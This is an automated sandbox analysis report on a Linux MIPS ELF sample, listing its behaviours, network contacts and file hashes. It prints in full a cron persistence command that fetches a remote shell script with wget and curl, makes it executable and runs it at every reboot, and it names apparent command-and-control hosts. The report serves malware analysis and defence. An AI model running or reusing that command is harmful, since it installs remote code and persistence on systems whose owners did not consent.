Analysis Overview
SHA256
cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3
Threat Level: Shows suspicious behavior
The file cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf received the verdict: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:54
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:54
Reported
2024-10-27 02:57
Platform
debian12-mipsel-20240221-en
Max time kernel
151s
Max time network
142s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
|---|---|---|---|
| Destination IP | 152.53.15.127 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /var/spool/cron/crontabs/tmp.wB9D8g | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
|---|---|---|---|
| Changes the process name, possibly in an attempt to hide itself | [watchdog/0] | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A |
Reads runtime system information
Processes
/tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
[/tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| DE | 152.53.15.127:53 | kingstonwikkerink.dyn | udp |
| UA | 88.151.195.22:5297 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.wB9D8g
| Hash | Value |
|---|---|
| MD5 | bfd2089040b748f688b70470021d4d43 |
| SHA1 | c2a6fac8ce436a014bb4149d14d7853259b9323c |
| SHA256 | cfb81f43363ede429f69a6c15d63fbfdb87246bd92fc6a55a189c1001bfb4b3b |
| SHA512 | 4aee0c647992fff8bc38624556617e8b78523f37f9169ecc32dbc303821881cf90f1fdccc9add3cfc06b6089a8f8e17878173f132a16db77cb152869c2ea487e |